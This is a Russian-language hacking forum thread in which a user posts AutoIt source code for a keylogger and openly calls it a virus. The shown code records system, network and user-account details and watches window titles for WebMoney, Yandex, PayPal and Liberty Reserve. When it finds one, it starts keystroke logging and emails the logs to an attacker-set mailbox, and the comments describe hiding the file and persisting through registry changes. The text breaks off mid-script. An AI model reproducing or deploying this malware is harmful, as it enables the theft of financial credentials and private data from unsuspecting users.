    $aCapture_Codes[79]=40
    $aCapture_Codes[80]=37
    EndFunc
    Дальше скрипт который будет детектить заголовки активных окон,запускать сам кейлогер и отправлять лог на почтовый ящик,в принципе из всех 3 скриптов данного кейлогера только и надо будет редактировать под себя,то есть вносить данные от почтового ящика и устанавливать промежуток времени записи лога файл stisx.au3
     
    11 фев 2012
  2. SeOqsss
    SeOqsss Новичок
    Симпатии:
    2
    Код:
    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;  [#[ Keyloger Site detektors 1.0 beta ® by Sw@p Specially for TheHackWorld.iN ©]#]  ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
    ; Данный вирус был написан специально для пользователей нашего нового ресурса посвященного теме безопасности в сети интернет TheHackWorld.iN
    ;Вирус состоит из трёх скриптов:
    ;stisx.au3 - скрипт который собирает не много информации о такчке на которой он запущен и детектит заголовки активных оконо и при нахождение нужного окна запускает сам кейлогер который пишет лог
    ;после ждёт некоротый промежуток времени(который вы укажите),останавливает работу кейлогера и отправляет отчет на почтовый ящик который вы укажите,после весь процесс повторяется.
    ;wincl.au3 - скрипт по сути является самим кейлогером,пишет символы в файл лога
    ;alsol.au3 - скрипт носитель,является носителем двух пред идущих скриптов,при запуске его он устанавливает пред идущие скрипты и запускает stisx.au3,так же вносит некоторые изменения в системе
    ;то есть правит пару ключей реестра и создаёт правило которое то и запускает наш кейлогер при каждом входе в систему.
    ;По сути все скрипты написаны предельно просто и будут просто замечательным (на мой взгляд) вирусом который можно сделать самому не зная ни какого языка программирования.
    ;                                                                          Sw@p Specially for TheHackWorld.iN ©
    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
    
    #NoTrayIcon
    #include <file.au3>
    #include <inet.au3>
    #include <process.au3>
    #Include<Array.au3>
    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; не много распишу алгоритм ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
    ;Данный скрипт собирает не много информации о тачке на которой он выполняется и вписывает это всё так сказать во временный лог файл,далее начинает отлавливать нужные слова в заголовках актичных окон
    ;до того момента пока какое либо из искомых слов не появится в поле зрения (так сказать),как только слово будет обнаружено запускает кейлогер и ждёт указнное количество времени,по истечению которого тормазит кейлогер
    ; читает файл лога и отправляет его в теле письма на указанный почтовый ящик,далее весь алгоритм повторяется,думаю более менее разъяснил тем самым обстанову алгоритмом данного скрипта,если всё же не очень понятно
    ;далее не много раскоментированы некоторые участки кода,изучив коменты и команды можно пополнить базу искомых слов.
    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Вносим данные от почтового(ых) ящика(ов) куда будут идти отчёта кейлогера ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
    filesetattrib ( @scriptname, "+s+h") ; ставим на себя атрибуты
    $smtpserver = "smtp.server.com"              ; адрес smtp сервера
    $fromname = @ComputerName                    ; в поле от кого будет указано имя тачки на которой был запущен вирус
    $fromaddress = "e-mail@server.com" ; адрес отправителя
    $toaddress = "e-mail@server.net"  ; адрес получателя,можно смело указывать другой почтовый ящик.
    $subject = "Отчёт Keyloger Site detektors 1.0 beta от "&@UserName&"."      ; тема письма,@UserName будет указывать имя пользователя под которым был запущен вирус
    $attachfiles = ''
    $ccaddress = ""
    $bccaddress = ""
    $importance = "normal"          ; приоритет отсылки письма,другие варианты: "high", "normal", "low"
    $username = "e-mail@server.com" ; имя отправителя
    $password = "Password"  ; пас отпрвителя
    $ipport = 587          ; порт можно 25,ну и так норм отправляет,для почтовой службы gmail необходимо сменить порт на 465 ($ipport=465)
    $ssl = 0
    $log = @WindowsDir & "\swnc\"&@UserName&"-log.sft"; это своего рода временный файл,который будет создаваться в отдельной папке,так сказать от греха подальше))
    $lang = @OSLang ; команда выводящия свое образный код языка системы
    
    Global $alang_Codes[127] ; массив для замены кода на нормальный буквенный понятный вид языка системы
    $alang_Codes[0]=126 ;указываем количество ячеек
    $alang_Codes[1]="Afrikaans" ;и перечисляем их
    $alang_Codes[2]="Albanian"
    $alang_Codes[3]="Arabic_Saudi_Arabia"
    $alang_Codes[4]="Arabic_Iraq"
    $alang_Codes[5]="Arabic_Egypt"
    $alang_Codes[6]="Arabic_Libya"
    $alang_Codes[7]="Arabic_Algeria"
    $alang_Codes[8]="Arabic_Morocco"
    $alang_Codes[9]="Arabic_Tunisia"
    $alang_Codes[10]="Arabic_Oman"
    $alang_Codes[11]="Arabic_Yemen"
    $alang_Codes[12]="Arabic_Syria"
    $alang_Codes[13]="Arabic_Jordan"
    $alang_Codes[14]="Arabic_Lebanon"
    $alang_Codes[15]="Arabic_Kuwait"
    $alang_Codes[16]="Arabic_UAE"
    $alang_Codes[17]="Arabic_Bahrain"
    $alang_Codes[18]="Arabic_Qatar"
    $alang_Codes[19]="Armenian"
    $alang_Codes[20]="Azeri_Latin"
    $alang_Codes[21]="Azeri_Cyrillic"
    $alang_Codes[22]="Basque"
    $alang_Codes[23]="Belarusian"
    $alang_Codes[24]="Bulgarian"
    $alang_Codes[25]="Catalan"
    $alang_Codes[26]="Chinese_Taiwan"
    $alang_Codes[27]="Chinese_PRC"
    $alang_Codes[28]="Chinese_Hong_Kong"
    $alang_Codes[29]="Chinese_Singapore"
    $alang_Codes[30]="Chinese_Macau"
    $alang_Codes[31]="Croatian"
    $alang_Codes[32]="Czech"
    $alang_Codes[33]="Danish"
    $alang_Codes[34]="Dutch_Standard"
    $alang_Codes[35]="Dutch_Belgian"
    $alang_Codes[36]="English_United_States"
    $alang_Codes[37]="English_United_Kingdom"
    $alang_Codes[38]="English_Australian"
    $alang_Codes[39]="English_Canadian"
    $alang_Codes[40]="English_New_Zealand"
    $alang_Codes[41]="English_Irish"
    $alang_Codes[42]="English_South_Africa"
    $alang_Codes[43]="English_Jamaica"
    $alang_Codes[44]="English_Caribbean"
    $alang_Codes[45]="English_Belize"
    $alang_Codes[46]="English_Trinidad"
    $alang_Codes[47]="English_Zimbabwe"
    $alang_Codes[48]="English_Philippines"
    $alang_Codes[49]="Estonian"
    $alang_Codes[50]="Faeroese"
    $alang_Codes[51]="Farsi"
    $alang_Codes[52]="Finnish"
    $alang_Codes[53]="French_Standard"
    $alang_Codes[54]="French_Belgian"
    $alang_Codes[55]="French_Canadian"
    $alang_Codes[56]="French_Swiss"
    $alang_Codes[57]="French_Luxembourg"
    $alang_Codes[58]="French_Monaco"
    $alang_Codes[59]="Georgian"
    $alang_Codes[60]="German_Standard"
    $alang_Codes[61]="German_Swiss"
    $alang_Codes[62]="German_Austrian"
    $alang_Codes[63]="German_Luxembourg"
    $alang_Codes[64]="German_Liechtenstei"
    $alang_Codes[65]="Greek"
    $alang_Codes[66]="Hebrew"
    $alang_Codes[67]="Hindi"
    $alang_Codes[68]="Hungarian"
    $alang_Codes[69]="Icelandic"
    $alang_Codes[70]="Indonesian"
    $alang_Codes[71]="Italian_Standard"
    $alang_Codes[72]="Italian_Swiss"
    $alang_Codes[73]="Japanese"
    $alang_Codes[74]="Kazakh"
    $alang_Codes[75]="Konkani"
    $alang_Codes[76]="Korean"
    $alang_Codes[77]="Latvian"
    $alang_Codes[78]="Lithuanian"
    $alang_Codes[79]="Macedonian"
    $alang_Codes[80]="Malay_Malaysia"
    $alang_Codes[81]="Malay_Brunei_Darussalam"
    $alang_Codes[82]="Marathi"
    $alang_Codes[83]="Norwegian_Bokmal"
    $alang_Codes[84]="Norwegian_Nynorsk"
    $alang_Codes[85]="Polish"
    $alang_Codes[86]="Portuguese_Brazilian"
    $alang_Codes[87]="Portuguese_Standard"
    $alang_Codes[88]="Romanian"
    $alang_Codes[89]="Russian"
    $alang_Codes[90]="Sanskrit"
    $alang_Codes[91]="Serbian_Latin"
    $alang_Codes[92]="Serbian_Cyrillic"
    $alang_Codes[93]="Slovak"
    $alang_Codes[94]="Slovenian"
    $alang_Codes[95]="Spanish_Traditional_Sort"
    $alang_Codes[96]="Spanish_Mexican"
    $alang_Codes[97]="Spanish_Modern_Sort"
    $alang_Codes[98]="Spanish_Guatemala"
    $alang_Codes[99]="Spanish_Costa_Rica"
    $alang_Codes[100]="Spanish_Panama"
    $alang_Codes[101]="Spanish_Dominican_Republic"
    $alang_Codes[102]="Spanish_Venezuela"
    $alang_Codes[103]="Spanish_Colombia"
    $alang_Codes[104]="Spanish_Peru"
    $alang_Codes[105]="Spanish_Argentina"
    $alang_Codes[106]="Spanish_Ecuador"
    $alang_Codes[107]="Spanish_Chile"
    $alang_Codes[108]="Spanish_Uruguay"
    $alang_Codes[109]="Spanish_Paraguay"
    $alang_Codes[110]="Spanish_Bolivia"
    $alang_Codes[111]="Spanish_El_Salvador"
    $alang_Codes[112]="Spanish_Honduras"
    $alang_Codes[113]="Spanish_Nicaragua"
    $alang_Codes[114]="Spanish_Puerto_Rico"
    $alang_Codes[115]="Swahili"
    $alang_Codes[116]="Swedish"
    $alang_Codes[117]="Swedish_Finland"
    $alang_Codes[118]="Tamil"
    $alang_Codes[119]="Tatar"
    $alang_Codes[120]="Thai"
    $alang_Codes[121]="Turkish"
    $alang_Codes[122]="Ukrainian"
    $alang_Codes[123]="Urdu"
    $alang_Codes[124]="Uzbek_Latin"
    $alang_Codes[125]="Uzbek_Cyrillic"
    $alang_Codes[126]="Vietnamese"
    
    global $aCapture_Codes[127] ;  в этом массиве находятся коды которые выводит команда @OSLang,а в пред идущем массиве находятся названия языков\стран уже в буквенном виде,так сказать расшифрованные,точно в таком же порядке.
    $aCapture_Codes[0]='126'
    $aCapture_Codes[1]='0436'
    $aCapture_Codes[2]='041c'
    $aCapture_Codes[3]='0401'
    $aCapture_Codes[4]='0801'
    $aCapture_Codes[5]='0c01'
    $aCapture_Codes[6]='1001'
    $aCapture_Codes[7]='1401'
    $aCapture_Codes[8]='1801'
    $aCapture_Codes[9]='1c01'
    $aCapture_Codes[10]='2001'
    $aCapture_Codes[11]='2401'
    $aCapture_Codes[12]='2801'
    $aCapture_Codes[13]='2c01'
    $aCapture_Codes[14]='3001'
    $aCapture_Codes[15]='3401'
    $aCapture_Codes[16]='3801'
    $aCapture_Codes[17]='3c01'
    $aCapture_Codes[18]='4001'
    $aCapture_Codes[19]='042b'
    $aCapture_Codes[20]='042c'
    $aCapture_Codes[21]='082c'
    $aCapture_Codes[22]='042d'
    $aCapture_Codes[23]='0423'
    $aCapture_Codes[24]='0402'
    $aCapture_Codes[25]='0403'
    $aCapture_Codes[26]='0404'
    $aCapture_Codes[27]='0804'
    $aCapture_Codes[28]='0c04'
    $aCapture_Codes[29]='1004'
    $aCapture_Codes[30]='1404'
    $aCapture_Codes[31]='041a'
    $aCapture_Codes[32]='0405'
    $aCapture_Codes[33]='0406'
    $aCapture_Codes[34]='0413'
    $aCapture_Codes[35]='0813'
    $aCapture_Codes[36]='0409'
    $aCapture_Codes[37]='0809'
    $aCapture_Codes[38]='0c09'
    $aCapture_Codes[39]='1009'
    $aCapture_Codes[40]='1409'
    $aCapture_Codes[41]='1809'
    $aCapture_Codes[42]='1c09'
    $aCapture_Codes[43]='2009'
    $aCapture_Codes[44]='2409'
    $aCapture_Codes[45]='2809'
    $aCapture_Codes[46]='2c09'
    $aCapture_Codes[47]='3009'
    $aCapture_Codes[48]='3409'
    $aCapture_Codes[49]='0425'
    $aCapture_Codes[50]='0438'
    $aCapture_Codes[51]='0429'
    $aCapture_Codes[52]='040b'
    $aCapture_Codes[53]='040c'
    $aCapture_Codes[54]='080c'
    $aCapture_Codes[55]='0c0c'
    $aCapture_Codes[56]='100c'
    $aCapture_Codes[57]='140c'
    $aCapture_Codes[58]='180c'
    $aCapture_Codes[59]='0437'
    $aCapture_Codes[60]='0407'
    $aCapture_Codes[61]='0807'
    $aCapture_Codes[62]='0c07'
    $aCapture_Codes[63]='1007'
    $aCapture_Codes[64]='1407'
    $aCapture_Codes[65]='408'
    $aCapture_Codes[66]='040d'
    $aCapture_Codes[67]='0439'
    $aCapture_Codes[68]='040e'
    $aCapture_Codes[69]='040f'
    $aCapture_Codes[70]='0421'
    $aCapture_Codes[71]='0410'
    $aCapture_Codes[72]='0810'
    $aCapture_Codes[73]='0411'
    $aCapture_Codes[74]='043f'
    $aCapture_Codes[75]='0457'
    $aCapture_Codes[76]='0412'
    $aCapture_Codes[77]='0426'
    $aCapture_Codes[78]='0427'
    $aCapture_Codes[79]='042f'
    $aCapture_Codes[80]='043e'
    $aCapture_Codes[81]='083e'
    $aCapture_Codes[82]='044e'
    $aCapture_Codes[83]='0414'
    $aCapture_Codes[84]='0814'
    $aCapture_Codes[85]='0415'
    $aCapture_Codes[86]='0416'
    $aCapture_Codes[87]='0816'
    $aCapture_Codes[88]='0418'
    $aCapture_Codes[89]='0419'
    $aCapture_Codes[90]='044f'
    $aCapture_Codes[91]='081a'
    $aCapture_Codes[92]='0c1a'
    $aCapture_Codes[93]='041b'
    $aCapture_Codes[94]='0424'
    $aCapture_Codes[95]='040a'
    $aCapture_Codes[96]='080a'
    $aCapture_Codes[97]='0c0a'
    $aCapture_Codes[98]='100a'
    $aCapture_Codes[99]='140a'
    $aCapture_Codes[100]='180a'
    $aCapture_Codes[101]='1c0a'
    $aCapture_Codes[102]='200a'
    $aCapture_Codes[103]='240a'
    $aCapture_Codes[104]='280a'
    $aCapture_Codes[105]='2c0a'
    $aCapture_Codes[106]='300a'
    $aCapture_Codes[107]='340a'
    $aCapture_Codes[108]='380a'
    $aCapture_Codes[109]='3c0a'
    $aCapture_Codes[110]='400a'
    $aCapture_Codes[111]='440a'
    $aCapture_Codes[112]='480a'
    $aCapture_Codes[113]='4c0a'
    $aCapture_Codes[114]='500a'
    $aCapture_Codes[115]='0441'
    $aCapture_Codes[116]='041d'
    $aCapture_Codes[117]='081d'
    $aCapture_Codes[118]='0449'
    $aCapture_Codes[119]='0444'
    $aCapture_Codes[120]='041e'
    $aCapture_Codes[121]='041f'
    $aCapture_Codes[122]='0422'
    $aCapture_Codes[123]='0420'
    $aCapture_Codes[124]='0443'
    $aCapture_Codes[125]='0843'
    $aCapture_Codes[126]='042a'
    
    $Pos = _ArraySearch ($aCapture_Codes, $lang) ;ищем по масиву с кодами определённый командой @OSLang код и записываем его позицую в код,после тупа подставим позицию во второй массив.
    
    Dim $strComputer = ".", $string, $strIPAddress, $IPAddress, $IPSubnet, $strIPSubnet, $DefaultIPGateway, $strDefaultIPGateway ;используем Win32_NetworkAdapterConfiguration для вытягивание некоротой инфы из компа
    
    $objWMIService = ObjGet("winmgmts:{impersonationLevel=impersonate}!\\" & $strComputer & "\root\cimv2")
    $colItems = $objWMIService.ExecQuery("Select * from Win32_NetworkAdapterConfiguration")
    
    на форуме тупое ограничение на символах в топе,хз нах оно нужно и что изменить большие содержание одного топа,вообщем тут половина кода,вторая половина будет ниже.
     
    11 фев 2012
  3. SeOqsss
    SeOqsss Новичок
    Симпатии:
    2
    Код:
    For $objItem In $colItems
        $string &= @LF
        $string &= "<BR><font color=teal style=font-size:17px>Caption:</font>  " & $objItem.Caption & @LF
        $string &= "<BR><font color=teal style=font-size:17px>Description:</font>  " & $objItem.Description & @LF
    
        If UBound($objItem.IPAddress) > 0 Then
            For $IPAddress In $objItem.IPAddress
                $strIPAddress &= $IPAddress & "; "
            Next
            $string &= "<BR><font color=teal style=font-size:17px>IPAddress:</font>  " & StringTrimRight($strIPAddress, 2) & @LF
        EndIf
    
        If UBound($objItem.IPSubnet) > 0 Then
            For $IPSubnet In $objItem.IPSubnet
                $strIPSubnet &= $IPSubnet & "; "
            Next
            $string &= "<BR><font color=teal style=font-size:17px>IPSubnet:</font>  " & StringTrimRight($strIPSubnet, 2) & @LF
        EndIf
    
        If UBound($objItem.DefaultIPGateway) > 0 Then
            For $DefaultIPGateway In $objItem.DefaultIPGateway
                $strDefaultIPGateway &= $DefaultIPGateway & "; "
            Next
            $string &= "<BR><font color=teal style=font-size:17px>DefaultIPGateway:</font>  " & StringTrimRight($strDefaultIPGateway, 2) & @LF
        EndIf
    
        $string &= "<BR><font color=teal style=font-size:17px>DNSDomain:</font>  " & $objItem.DNSDomain & @LF
        $string &= "<BR><font color=teal style=font-size:17px>DNSHostName:</font>  " & $objItem.DNSHostName & @LF
        $string &= "<BR><font color=teal style=font-size:17px>MACAddress:</font>  " & $objItem.MACAddress & @LF
    Next
    
    Dim $stComputer = ".", $stri ; практически таким же макаром вытяним локальную информацию о тачке на которой находится наш кейлогер
    
    $objWMIService = ObjGet("winmgmts:{impersonationLevel=impersonate}!\\" & $stComputer & "\root\cimv2")
    $colItems = $objWMIService.ExecQuery("Select * from Win32_UserAccount")
    
    For $objItem In $colItems
        $stri &= "<BR><font color=teal style=font-size:17px>Caption -</font> " & $objItem.Caption & @LF
        $stri &= "<BR><font color=teal style=font-size:17px>Account Type -</font> " & $objItem.AccountType & @LF
        $stri &= "<BR><font color=teal style=font-size:17px>Disabled - </font>" & $objItem.Disabled & @LF
        $stri &= "<BR><font color=teal style=font-size:17px>Domain - </font>" & $objItem.Domain & @LF
        $stri &= "<BR><font color=teal style=font-size:17px>Full Name - </font>" & $objItem.FullName & @LF
        $stri &= "<BR><font color=teal style=font-size:17px>Install Date -</font> " & $objItem.InstallDate & @LF
        $stri &= "<BR><font color=teal style=font-size:17px>Local Account - </font>" & $objItem.LocalAccount & @LF
        $stri &= "<BR><font color=teal style=font-size:17px>Lockout -</font> " & $objItem.Lockout & @LF
        $stri &= "<BR><font color=teal style=font-size:17px>Name -</font> " & $objItem.Name & @LF
        $stri &= "<BR><font color=teal style=font-size:17px>Password Changeable - </font>" & $objItem.PasswordChangeable & @LF
        $stri &= "<BR><font color=teal style=font-size:17px>Password Expires -</font> " & $objItem.PasswordExpires & @LF
        $stri &= "<BR><font color=teal style=font-size:17px>Password Required -</font> " & $objItem.PasswordRequired & @LF
        $stri &= "<BR><font color=teal style=font-size:17px>SID -</font> " & $objItem.SID & @LF
        $stri &= "<BR><font color=teal style=font-size:17px>SID Type -</font> " & $objItem.SIDType & @LF
        $stri &= "<BR><font color=teal style=font-size:17px>Status -</font> " & $objItem.Status
    Next
    
    FileOpen($log, 2);открываем файл лога для записи и начинаем писать
    Sleep(100)
    FileWrite($log, '<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251">') ; ну эт тип для того чтобы в письме не отображались краказябры,а все приходило в понятном для человеческого глаза виде,тупа HTML теги и команды,их расписывать не буду
    ; ибо это уже перебор.
    FileWrite($log, '<body background="http://i5.pixs.ru/storage/1/4/1/matricabel_9581274_3013141.gif" bgcolor=#000000 text=green>')
    FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=#ff0000 style=font-size:28px> Keyloger Site detektors 1.0 beta &reg; </font><font color=crimson>]#]</font></center></b><br><br><br>")
      FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px>Данные о тачке на котрой запущен Keylogger Widows detektors 1.0 beta :</font> <font color=crimson>]#]</font> </center></b><br>")
      FileWrite($log, "<b><font color=saddlebrown style=font-size:19px>Внутрений IP Адрес:</b> </font><font color=teal style=font-size:17px>"& @IPAddress1&" </font><br>") ; пишем внутрений ip адрес тачки, может вернуть 127.0.0.1
      FileWrite($log, "<b><font color=saddlebrown style=font-size:19px>Возвращает IP адрес 2 сетевого адаптера(при отсутствие вернёт 0.0.0.0):</font> </b><font color=teal style=font-size:17px>"& @IPAddress2&" </font><br>"); ну аналогично только возращает IP второго сетевого
      FileWrite($log, "<b><font color=saddlebrown style=font-size:19px>Возвращает IP адрес 3 сетевого адаптера(при отсутствие вернёт 0.0.0.0):</font> </b><font color=teal style=font-size:17px>"& @IPAddress3&" </font><br>"); и так далее до 4 сетевых адаптеров
      FileWrite($log, "<b><font color=saddlebrown style=font-size:19px>Возвращает IP адрес 4 сетевого адаптера(при отсутствие вернёт 0.0.0.0):</font> </b><font color=teal style=font-size:17px>"& @IPAddress4&" </font><br>");
      FileWrite($log, "<b><font color=saddlebrown style=font-size:19px>Имя Пользователя:</b> </font><font color=teal style=font-size:17px>" & @UserName &" </font><br>") ; вписываем имя текущего пользователя под которым запущен кейлогер
      FileWrite($log, "<b><font color=saddlebrown style=font-size:19px>Сетевое имя компьютера:</font> </b><font color=teal style=font-size:17px>"& @ComputerName&" </font><br>") ; имя компьютера
    FileWrite($log, "<b><font color=saddlebrown style=font-size:19px>Тип оперативной системы:</font> </b><font color=teal style=font-size:17px>"& @OSType &" </font><br>") ; тип установленной ОС под которой запущен кейлогер
    FileWrite($log, "<b><font color=saddlebrown style=font-size:19px>Версия оперативной системы:</font> </b><font color=teal style=font-size:17px>"& @OSVersion &" </font><br>") ; версия ОС
    FileWrite($log, "<b><font color=saddlebrown style=font-size:19px>Язык оперативной системы:</font> </b><font color=teal style=font-size:17px>"& $alang_Codes[$Pos] &" </font><br>") ; вписываем язык системы по умолчанию
    FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Информация полученная при помощи Win32_NetworkAdapterConfiguration:</font> <font color=crimson>]#]</font> </center></b><br>")
    FileWrite($log, $string) ; пишем инфу вытянутую при помощи Win32_NetworkAdapterConfiguration
      FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Локальная информация ОС:</font> <font color=crimson>]#]</font> </center></b><br>")
    FileWrite($log, $stri) ; пишем локальную информацию
    FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Список запущенных процессов:</font> <font color=crimson>]#]</font> </center></b><br>")
    $list = ProcessList() ; далее определяем список запущенных в данный момент процессов
    for $i = 1 to $list[0][0]
      FileWrite($log," <font color=teal style=font-size:17px> Name process: </font>"& $list[$i][0] & "<br>") ; и пишем его,каждый процесс с новой строки
    next
    FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Количество и имена дисков на тачке:</font> <font color=crimson>]#]</font> </center></b><br>")
    
    $var = DriveGetDrive( "all" ) ; определяем общее количество дисков
    If NOT @error Then
        FileWrite($log,"<font color=teal style=font-size:17px>Всего " & $var[0] & " диск(а\ов)</font><br>") ; пишем коичество всех дисков
        For $i = 1 to $var[0]
            FileWrite($log,"<font color=teal style=font-size:17px> " & $var[$i]& ",</font>") ; выводим каждый диск через запятую по имени
        Next
    EndIf
    
    $var2 = DriveGetDrive( "CDROM" ) ; определяем какие из них CD rom'ы
    If NOT @error Then
        FileWrite($log,"<br><font color=teal style=font-size:17px>Из них " & $var2[0] & " CDROM(а) </font><br>") ; пишем количество CD rom'ов и есть ли они вообще
        For $i = 1 to $var2[0]
            FileWrite($log,"<font color=teal style=font-size:17px> " & $var2[$i]& ",</font>") ; перечисляем их по именам
        Next
    EndIf
    
    $var3 = DriveGetDrive( "REMOVABLE" ) ; определяем есть ли переносные диски
    If NOT @error Then
        FileWrite($log,"<br><font color=teal style=font-size:17px> Ещё " & $var3[0] & " предположительно являются Flash либо просто переносные </font><br>"); пишем сколько их если они есть вообще
        For $i = 1 to $var3[0]
            FileWrite($log,"<font color=teal style=font-size:17px> " & $var3[$i]& ",</font>") ; перечисляем их по именам
        Next
    EndIf
    
    $var4 = DriveGetDrive( "FIXED" ) ; определяем какие из них фиксированные
    If NOT @error Then
        FileWrite($log,"<br><font color=teal style=font-size:17px> Ещё " & $var4[0] & " фиксированные(й)</font><br>") ; пишем количества
        For $i = 1 to $var4[0]
            FileWrite($log,"<font color=teal style=font-size:17px> " & $var4[$i]& ",</font>") ; перечисляем их по именам
        Next
    EndIf
    
    $var5 = DriveGetDrive( "NETWORK" ) ; определяем есть ли сетевые диски
    If NOT @error Then
        FileWrite($log,"<br><font color=teal style=font-size:17px> Ещё " & $var5[0] & " сетевой(ых)</font><br>") ; если есть пишем количество
        For $i = 1 to $var5[0]
            FileWrite($log,"<font color=teal style=font-size:17px> " & $var5[$i]& ",</font>") ; перечисляем их по именам
        Next
    EndIf
    
    $var6 = DriveGetDrive( "RAMDISK" ) ; определяем где RAm диски
    If NOT @error Then
        FileWrite($log,"<br><font color=teal style=font-size:17px> Ещё " & $var6[0] & " RAMDISK(а)</font><br>") ; выводим их количество
        For $i = 1 to $var6[0]
            FileWrite($log,"<font color=teal style=font-size:17px> " & $var6[$i]& ",</font>") ; перечисляем их по именам
        Next
    EndIf
    
      $var6 = DriveGetDrive( "UNKNOWN" ) ; определяем есть ли такие которые не поддаются определению
    If NOT @error Then
        FileWrite($log,"<br><font color=teal style=font-size:17px> остальные " & $var6[0] & " не определен(ы)</font><br>"); если есть выводим количество
        For $i = 1 to $var6[0]
            FileWrite($log,"<font color=teal style=font-size:17px> " & $var6[$i]& ",</font>") ; перечисляемих по именам
        Next
    EndIf
    FileWrite($log,"<br><font color=teal style=font-size:17px>Система стоит на диске: " & @HomeDrive & " ,путь до системной папки: "& @SystemDir &  "<br></font><br>") ;@HomeDrive аналогичен команде CMD %HomeDrive%,то есть тупа определяем на каком диске стоит система,ну @SystemDir думаю понятно,ловим путь до папки system32.
      FileWrite($log, "<br><br><b><center><font color=teal style=font-size:16px> Если не понятки,то есть если нажата не буква и не цифра будет показан номер клавиши,в виде: </font><font color=#ff0000 style=font-size:15px>#ХЗ №(номер клавиши)#</font></center></b><br>")
    
    While 1
        WinWaitActive("", "") ; ну и основа так сказать)),вообщем начинаем процесс отлова заголоков активных окон
        If WinWaitActive("WebMoney","",1) Then ; указываем какое слово будем искать в заголовке активного окна и в последствие среагируем.
            Sleep(100)
            FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Старт записи лога в файл(время старта,найденное слово в заголовке,предположительный адрес сайта):</font> <font color=crimson>]#]</font> </center></b><br>") ;если поймали нужное нам слово,то
    FileWrite($log, "<br><BR>" & "<b><font color=teal style=font-size:15px>Время:</font> <font color=#00ffff style=font-size:14px>[" & @YEAR & "." & @MON & "." & @MDAY & " " & @HOUR & ":" & @MIN & ":" & @SEC & ']</font><font color=teal style=font-size:15px> Найдено в заголовке :</font> <font color=#00ffff style=font-size:14px>  WebMoney </font><font color=teal style=font-size:15px>Предположительный адрес сайта:</font> <font color=#00ffff style=font-size:14px> <a href=https://webmoney.ru target=blanck>https://webmoney.ru</a></font></b><br>"') ; пишем время,какое слово было обнаруженно и предположительный адрес сайта.
    FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:17px> Log : </font><font color=crimson>]#]</font> </center></b><br>")
    FileClose($log) ; закрываем файл лога
    ShellExecute( @WindowsDir & "\GTS\wincl.exe") ; запускаем наш кейлогер
    sleep(100)
    _quit(); запускаем функцию,которая в свою очередь несёт не малую роль в алгоритме всего скрипта,а именно: ждёт указнное количество времени,останавливает кейлогер,отправляет письмо в теле которого будет весь записанный лог вместе с полученной информацией
        ElseIf WinWaitActive("Яндекс","",1) Then ; ну а дальше аналогия предидущему,только искомые слова другие,таким же образом можно добавить ещё практически сколько угодно искомых слов,главное не переборщить,иначе скрипт будет тупа подтупливать
            Sleep(100)
    FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Старт записи лога в файл(время старта,найденное слово в заголовке,предположительный адрес сайта):</font> <font color=crimson>]#]</font> </center></b><br>")
    FileWrite($log, "<br><BR>" & "<b><font color=teal style=font-size:15px>Время:</font> <font color=#00ffff style=font-size:14px>[" & @YEAR & "." & @MON & "." & @MDAY & " " & @HOUR & ":" & @MIN & ":" & @SEC & ']</font><font color=teal style=font-size:15px> Найдено в заголовке :</font> <font color=#00ffff style=font-size:14px>  Яндекс </font><font color=teal style=font-size:15px>Предположительный адрес сайта:</font> <font color=#00ffff style=font-size:14px> <a href=http://yandex.ru target=blanck>http://yandex.ru</a></font></b><br>"')
    FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:17px> Log : </font><font color=crimson>]#]</font> </center></b><br>")
    FileClose($log)
    ShellExecute( @WindowsDir & "\GTS\wincl.exe")
    sleep(100)
    _quit()
      ElseIf WinWaitActive("PayPal","",1) Then
            Sleep(100)
    FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Старт записи лога в файл(время старта,найденное слово в заголовке,предположительный адрес сайта):</font> <font color=crimson>]#]</font> </center></b><br>")
    FileWrite($log, "<br><BR>" & "<b><font color=teal style=font-size:15px>Время:</font> <font color=#00ffff style=font-size:14px>[" & @YEAR & "." & @MON & "." & @MDAY & " " & @HOUR & ":" & @MIN & ":" & @SEC & ']</font><font color=teal style=font-size:15px> Найдено в заголовке :</font> <font color=#00ffff style=font-size:14px>  PayPal </font><font color=teal style=font-size:15px>Предположительный адрес сайта:</font> <font color=#00ffff style=font-size:14px> <a href=https://www.paypal.com/ru target=blanck>https://www.paypal.com/</a></font></b><br>"')
    FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:17px> Log : </font><font color=crimson>]#]</font> </center></b><br>")
    FileClose($log)
    ShellExecute( @WindowsDir & "\GTS\wincl.exe")
    sleep(100)
    _quit()
      ElseIf WinWaitActive("Liberty Reserve","",1) Then
            Sleep(100)
    FileWrite($log, "<b><center><font color=crimson>[#[</font><font color=indigo style=font-size:19px> Старт записи лога в файл(время старта,найденное слово в заголовке,предположительный адрес сайта):</font> <font color=crimson>]#]</font> </center></b><br>")
